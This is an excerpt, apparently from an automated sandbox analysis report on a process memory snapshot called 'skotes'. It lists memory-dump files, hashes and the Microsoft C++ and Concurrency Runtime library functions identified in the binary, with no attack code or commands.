Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 6ad9086a034f5c1e35841c7c4d47f16a510e64031a470206ed44beb07928a294
Instruction ID: c050a045a907c500de4bb4bad68eead486d4bf98fea1eef957e3f17743c1b58e
Opcode Fuzzy Hash: 6ad9086a034f5c1e35841c7c4d47f16a510e64031a470206ed44beb07928a294
Instruction Fuzzy Hash: 8B81CE31900249AFDF16AFA4CA51BBE7BBAAF45304F044098EC417B3A2C7369D16DB61

Function 00982970 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00982982

Part of subcall function 009824E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00982504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 009829A3
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 009829B0
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 009829FE
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00982AA6
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00982AD8

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: 889631476091b0c7c0cf7bc2d8cad9ca9a6038a9131c2c5a51488cc53a5a3b30
Instruction ID: 80501d44229d67b88ab9e07dfed6926108d282417e4415af05696f4204fcffb3
Opcode Fuzzy Hash: 889631476091b0c7c0cf7bc2d8cad9ca9a6038a9131c2c5a51488cc53a5a3b30
Instruction Fuzzy Hash: 8771A070900249AFDF15EFA4C991BBEBBB9AF86304F044099EC416B392C736DD15DB61

Function 00972832 Relevance: 15.2, APIs: 10, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00972876
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 009728DF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00972913

Part of subcall function 009707ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0097080D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00972993
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 009729DB

Part of subcall function 009707C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 009707DE

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 009729EF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00972A00
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00972A4D
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00972A7E

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
String ID:
API String ID: 1321587334-0
Opcode ID: 3542cb0078d301592ce5cb3eb5283a9687e45bee2a899250267877cb73009cf1
Instruction ID: 60d48f0eb71b7bc44f9a3871f0f8ddbe0f30b5d15047535cfd13b27a6d8504bd
Opcode Fuzzy Hash: 3542cb0078d301592ce5cb3eb5283a9687e45bee2a899250267877cb73009cf1
Instruction Fuzzy Hash: C081E332A24626DBCB18DFA9D9906BDBBF5BF88310B29812DD549E7281D7319D40CB90

Function 009769DA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00976A1F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00976A51
List.LIBCONCRT ref: 00976A8C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00976A9D
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00976AB9
List.LIBCONCRT ref: 00976AF4
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00976B05
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00976B20
List.LIBCONCRT ref: 00976B5B
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00976B68

Part of subcall function 00975EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00975EF7
Part of subcall function 00975EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00975F09

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction ID: b5e04b8f9bf86659024d7c739fc02e5eb2b0ddb3c94ac69de80680cdd232808a
Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction Fuzzy Hash: D0513172A00609AFDF08DF54C595BEDB3A8BF48344F158069E919AB242DB70EE45CB90

Function 009852A5 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 009853A0
type_info::operator==.LIBVCRUNTIME ref: 009853C7
___TypeMatch.LIBVCRUNTIME ref: 009854D3
IsInExceptionSpec.LIBVCRUNTIME ref: 009855AE
CallUnexpected.LIBVCRUNTIME ref: 00985650

Strings

csm, xrefs: 009853FE
csm, xrefs: 0098534D
csm, xrefs: 009852E0

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
